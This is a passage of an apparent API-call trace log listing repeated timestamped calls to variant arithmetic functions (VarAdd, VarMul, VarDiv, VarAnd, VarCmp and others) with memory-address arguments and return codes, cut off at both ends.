pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.434] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.434] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.434] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.434] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.434] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.434] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.434] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.434] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.435] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.435] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.435] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.435] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.435] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.435] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.435] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.435] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.435] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.435] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.435] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.435] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.435] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.435] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.435] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.435] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.435] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.435] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.435] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.435] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.435] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.435] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.435] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.435] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.435] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.435] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.435] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.435] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.436] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.436] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.436] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.436] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.436] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.436] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.436] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.436] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.436] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.436] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.436] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.436] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.436] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.436] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.436] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.436] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.436] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.436] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.436] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.436] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.436] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.436] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.436] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.436] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.436] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.436] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.436] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.436] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.437] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.437] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.437] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.437] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.437] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.437] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.437] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.437] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.437] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.437] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.437] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.437] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.437] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.437] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.437] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.437] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.437] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.437] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.437] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.437] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.437] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.437] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.437] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.437] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.437] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.437] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.438] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.438] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.438] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.438] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.438] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.438] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.438] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.438] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.438] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.438] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.438] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.438] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.438] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.438] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.438] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.438] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.438] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.438] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.438] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.438] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.438] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.438] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.438] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.438] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.438] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.438] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.438] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.438] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.438] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.438] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.439] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.439] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.439] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.439] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.439] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.439] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.439] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.439] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.439] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.439] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.439] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.439] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.439] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.439] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.439] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.439] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.439] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.439] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.439] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.439] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.439] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.439] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.439] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.439] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.439] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.439] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.439] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.439] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.439] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.440] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.440] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.440] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.440] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.440] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.440] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.440] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.440] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.440] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.440] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.440] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.440] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.440] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.440] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.440] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.440] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.440] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.440] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.440] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.440] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.440] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.440] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.440] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.440] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.440] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.440] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.440] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.440] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.440] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.440] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.440] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.440] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.441] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.441] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.441] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.441] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.441] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.441] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.441] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.441] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.441] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.441] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.441] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.441] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.441] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.441] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.441] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.441] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.441] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.441] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.441] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.441] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.441] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.441] VarAdd 